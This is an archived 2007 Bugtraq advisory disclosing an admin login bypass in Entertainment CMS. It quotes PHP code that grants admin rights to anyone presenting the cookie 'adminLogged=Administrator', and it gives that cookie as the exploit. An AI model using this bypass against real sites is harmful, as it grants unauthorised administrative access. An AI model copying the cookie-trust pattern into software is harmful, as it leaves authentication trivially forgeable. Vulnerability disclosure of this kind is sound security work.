lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070710151707.12422.qmail@securityfocus.com>
Date: 10 Jul 2007 15:17:07 -0000
From: mata@...rlndoarme.net
To: bugtraq@...urityfocus.com
Subject: Entertainment CMS Admin Login Bypass

Entertainment CMS Admin Login Bypass

Web: Entertainment CMS
Demo : http://multimedia.mydlstore.net/
Download: http://rapidshare.com/files/39640099/enter-cms.rar

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

Vulnerable codE:

$adminOK=0;
    
    if (isset($_POST["adminUser"])) {
        if (($_POST["adminUser"]==$adminUser) && ($_POST["adminPass"]==$adminPass)) {
            setcookie("adminLogged","Administrator", NULL, "/");
            $adminOK=1;
        }
    }
    
    if ((isset($_COOKIE["adminLogged"])) && ($_COOKIE["adminLogged"]=="Administrator")) {
        $adminOK=1;
    }




Exploit:
Set your cookie: adminLogged=Administrator then g0 to http:/site.com/admin/ and you have full admin access

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ] [ RST will be back s00n ]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ